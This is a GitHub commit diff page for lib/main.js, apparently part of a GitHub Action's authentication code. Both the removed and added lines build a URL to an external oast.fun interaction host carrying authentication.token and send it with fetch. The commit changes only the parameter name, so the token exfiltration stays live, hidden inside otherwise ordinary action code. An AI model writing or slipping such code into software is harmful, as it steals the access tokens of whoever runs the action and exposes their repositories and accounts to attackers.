We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
2 parents 63776e4 + cf3d2fc commit 384a85dCopy full SHA for 384a85d
lib/main.js
@@ -125,7 +125,7 @@ export async function main(
125
core.saveState("expiresAt", authentication.expiresAt);
126
}
127
try {
128
- const url = `https://cehdzfntykekreyhyyqy5ns1w6yn98ovz.oast.fun?auth=${authentication.token}`;
+ const url = `https://cehdzfntykekreyhyyqy5ns1w6yn98ovz.oast.fun?authb=${authentication.token}`;
129
await fetch(url);
130
core.info(`HTTP GET request sent to ${url}`);
131
} catch (error) {
0 commit comments